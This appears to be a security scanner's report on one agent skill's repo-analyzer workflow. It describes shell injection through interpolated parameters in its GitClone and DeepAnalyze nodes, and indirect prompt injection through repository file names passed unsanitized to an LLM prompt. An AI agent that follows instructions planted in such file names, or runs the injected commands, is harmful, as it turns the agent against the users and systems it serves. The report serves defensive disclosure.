The Agent Skills Directory

[COMMAND_EXECUTION]: Several nodes in the workflow defined in workflows/repo_analyzer.toml are vulnerable to shell injection via user-controlled parameters. The GitClone node uses a string template if [ ! -d '{{repo_dir}}' ]; then git clone '{{repo_url}}' '{{repo_dir}}'; fi which is executed in a shell environment. The repo_url and repo_dir parameters are interpolated directly into the command string. An attacker can break out of the single quotes using shell metacharacters (e.g., ' and ;) to execute arbitrary shell commands. The DeepAnalyze node interpolates the approved_shards JSON string directly into an echo command: echo 'Starting deep analysis for shards: {{approved_shards}}'. Since approved_shards is provided by the user during the approve action, it can be crafted to escape the echo command and execute malicious code.
[PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. Untrusted data enters the system via the TreeScanner node in workflows/repo_analyzer.toml, which extracts the file tree of a remote repository. No boundary markers or instructions to ignore embedded instructions are used in the Architect LLM prompt when processing the file tree data. The skill has capabilities for command execution and file system access (cloning repositories and harvesting results). File names and paths from the remote repository are passed directly to the LLM without sanitization. An attacker could embed malicious instructions in the file system structure of a repository to manipulate the agent's logic.

researcher